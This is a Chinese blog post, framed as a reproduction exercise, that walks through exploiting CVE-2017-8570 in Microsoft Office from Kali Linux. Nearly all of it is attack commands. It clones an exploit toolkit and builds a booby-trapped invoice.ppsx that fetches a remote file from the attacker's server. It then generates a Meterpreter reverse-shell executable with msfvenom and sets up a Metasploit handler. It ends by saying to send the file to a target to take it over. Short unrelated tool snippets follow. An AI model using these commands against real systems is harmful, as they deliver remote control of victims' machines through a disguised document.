kali下CVE 2017 8570利用復現實驗

2021-08-15 21:23:58 字數 1332 閱讀 4945

參考:

簡介:microsoft office容易出現遠端**執行漏洞。 攻擊者可以利用此問題在當前登入的使用者的上下文中執行任意**。 漏洞嘗試可能會導致拒絕服務條件。

影響範圍:

microsoft office 2007 service pack 3

microsoft office 2010 service pack 2 (32-bit editions)

microsoft office 2010 service pack 2 (64-bit editions)

microsoft office 2013 rt service pack 1

microsoft office 2013 service pack 1 (32-bit editions)

microsoft office 2013 service pack 1 (64-bit editions)

microsoft office 2016 (32-bit edition)

microsoft office 2016 (64-bit edition)

cd /tmp

git clone

cd office8570

python cve-2017-8570_toolkit.py -m gen -w invoice.ppsx -u http://監聽者的ip/logo.doc

這裡會提示找不到檔案,只需要建立template目錄,然後把提示到的檔案mv進去就ok,用到的檔案會在報錯最後一行提示

再次執行一遍就成功了

生成了invoice.ppsx檔案

msfvenom -p windows/meterpreter/reverse_tcp lhost=監聽者ip lport=監聽者埠 -f exe > /tmp/shell.exe

python cve-2017-8570_toolkit.py -m exp -e http://監聽者ip/shell.exe -l /tmp/shell.exe

msfconsole

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 監聽者ip

set lport 監聽者埠

exploit

將invoice.ppsx傳給目標,在目標開啟這個ppt檔案,拿下目標。

在中,定義了三種不同情景的操作指導。

另:apt-get install bleachbit -y

這個軟體可以清理linux電腦的一些快取

kali下vulhub的使用

sudo service docker start 啟動docker服務cd ls 命令進入目標檔案下 本次例項 vulhub activemq cve 2016 3088 執行命令 docker compose up d 推薦 或者 docker compose build 編譯環境啟動容器ps ...

kali下automater的基本使用

kali下工具整合的非常全,automater這款工具是乙個開源智慧型的搜尋資訊工具 在我看來 它可以進行ip,url,以及hash值的查詢。automater的主要查詢站點在它的配置檔案 usr share automater tekdefense.xml中,另乙個配置檔案相同目錄下的 sites...

docker 安裝 巡風 kali下安裝

使用kali環境安裝巡風 版本 linux k 4.13.0 kali1 amd64 1 smp debian 4.13.13 1kali1 2017 11 17 x86 64 gnu linux 這裡選擇docker engine 17.04.0 ce 0 debian jessie amd64....